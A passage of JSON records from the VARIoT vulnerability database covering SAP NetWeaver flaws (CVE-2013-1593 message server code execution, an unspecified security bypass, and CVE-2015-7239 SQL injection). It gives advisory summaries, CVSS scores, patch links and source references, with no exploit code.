Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code\nExecution Vulnerability\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-104\nJune 27, 2012\n\n- -- CVE ID:\n\n\n- -- CVSS:\n10, AV:N/AC:L/Au:N/C:C/I:C/A:C\n\n- -- Affected Vendors:\nSAP\n\n- -- Affected Products:\nSAP NetWeaver\n\n\n- -- TippingPoint(TM) IPS Customer Protection:\nTippingPoint IPS customers have been protected against this\nvulnerability by Digital Vaccine protection filter ID 12407. \n\n\n- -- Vendor Response:\nSAP has issued an update to correct this vulnerability. More details can be\nfound at:\nhttp://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1\n0-eea7-ceb666083a6a#section40\n\n\n- -- Disclosure Timeline:\n2011-10-28 - Vulnerability reported to vendor\n2012-06-27 - Coordinated public release of advisory\n\n\n- -- Credit:\nThis vulnerability was discovered by:\n* e6af8de8b1d4b2b6d5ba2610cbf9cd38\n\n\n- -- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n http://twitter.com/thezdi\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 10.2.0 (Build 1950)\nCharset: utf-8\n\nwsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t\nuAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E\n1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR\nXFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3\nJqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6\nwGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA==\n=t/ct\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1593"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
}
],
"trust": 5.49
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-1593",
"trust": 2.9
},
{
"db": "BID",
"id": "57956",
"trust": 2.0
},
{
"db": "SECTRACK",
"id": "1028148",
"trust": 1.7
},
{
"db": "ZDI",
"id": "ZDI-12-104",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2012-3434",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-3433",
"trust": 0.8
},
{
"db": "ZDI",
"id": "ZDI-12-112",
"trust": 0.8
},
{
"db": "ZDI",
"id": "ZDI-12-111",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1396",
"trust": 0.7
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1394",
"trust": 0.7
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1395",
"trust": 0.7
},
{
"db": "BID",
"id": "54229",
"trust": 0.6
},
{
"db": "BID",
"id": "54231",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201302-368",
"trust": 0.6
},
{
"db": "IVD",
"id": "29348194-1F62-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "29FDB3DE-1F62-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "120350",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2013-1593",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "114279",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-368"
},
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"id": "VAR-202001-0833",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
}
],
"trust": 1.87111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 1.6
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
}
]
},
"last_update_date": "2024-07-23T22:37:43.471000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP has issued an update to correct this vulnerability.",
"trust": 1.4,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"title": "top page",
"trust": 0.8,
"url": "https://www.sap.com/japan/index.html"
},
{
"title": "SAP has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
},
{
"title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 parameter name patch for remote code execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/18435"
},
{
"title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 patch for buffer overflow vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/18434"
},
{
"title": "SAP NetWeaver \u2018msg_server.exe\u2019 Remediation measures for remote denial of service vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=108971"
},
{
"title": "martingalloar",
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar "
},
{
"title": "publications",
"trust": 0.1,
"url": "https://github.com/martingalloar/publications "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-368"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-129",
"trust": 1.0
},
{
"problemtype": "Improper validation of array index (CWE-129) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.coresecurity.com/content/sap-netweaver-msg-srv-multiple-vulnerabilities"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/57956"
},
{
"trust": 1.7,
"url": "https://packetstormsecurity.com/files/cve/cve-2013-1593"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82065"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1028148"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1593"
},
{
"trust": 1.4,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"trust": 0.7,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
},
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2012/jun/186"
},
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2012/jun/185"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/129.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/120350/sap-netweaver-message-server-buffer-overflow.html"
},
{
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1800603."
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-104/."
},
{
"trust": 0.1,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm."
},
{
"trust": 0.1,
"url": "http://www.sap.com/platform/netweaver/index.epx."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1592"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm."
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-112/."
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-111/."
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
},
{
"trust": 0.1,
"url": "http://twitter.com/thezdi"
},
{
"trust": 0.1,
"url": "http://www.tippingpoint.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
},
{
"trust": 0.1,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-104"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-368"
},
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-368"
},
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-02T00:00:00",
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"date": "2012-07-02T00:00:00",
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"date": "2012-06-27T00:00:00",
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"date": "2020-01-23T00:00:00",
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"date": "2013-02-13T00:00:00",
"db": "BID",
"id": "57956"
},
{
"date": "2020-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"date": "2013-02-15T23:44:44",
"db": "PACKETSTORM",
"id": "120350"
},
{
"date": "2012-06-28T03:51:55",
"db": "PACKETSTORM",
"id": "114279"
},
{
"date": "2013-02-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-368"
},
{
"date": "2020-01-23T20:15:11.730000",
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"date": "2012-06-27T00:00:00",
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"date": "2020-01-31T00:00:00",
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"date": "2013-06-12T18:46:00",
"db": "BID",
"id": "57956"
},
{
"date": "2020-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"date": "2020-05-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-368"
},
{
"date": "2020-01-31T16:42:13.070000",
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-368"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 Parameter name remote code execution vulnerability",
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201302-368"
}
],
"trust": 0.6
}
}
var-201703-1430
Vulnerability from variot
SAP NetWeaver is prone to an unspecified security-bypass vulnerability. Remote attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201703-1430",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "96875"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "96875"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an unspecified security-bypass vulnerability.\nRemote attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.",
"sources": [
{
"db": "BID",
"id": "96875"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "96875",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "96875"
}
]
},
"id": "VAR-201703-1430",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:43:14.616000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/07/11/sap-security-patch-day-july-2017/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2416119"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/03/14/sap-security-patch-day-march-2017/ "
}
],
"sources": [
{
"db": "BID",
"id": "96875"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "96875"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-14T00:00:00",
"db": "BID",
"id": "96875"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-12T13:06:00",
"db": "BID",
"id": "96875"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "96875"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Unspecified Security Bypass Vulnerability",
"sources": [
{
"db": "BID",
"id": "96875"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "96875"
}
],
"trust": 0.3
}
}
var-201509-0262
Vulnerability from variot
SQL injection vulnerability in the BP_FIND_JOBS_WITH_PROGRAM function module in SAP NetWeaver J2EE Engine 7.40 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. SAP NetWeaver is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. SAP NetWeaver 7.40 is vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201509-0262",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver j2ee engine",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
}
],
"sources": [
{
"db": "BID",
"id": "79344"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004934"
},
{
"db": "NVD",
"id": "CVE-2015-7239"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-373"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_j2ee_engine:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7239"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vahagn Vardanyan (ERPScan)",
"sources": [
{
"db": "BID",
"id": "79344"
}
],
"trust": 0.3
},
"cve": "CVE-2015-7239",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
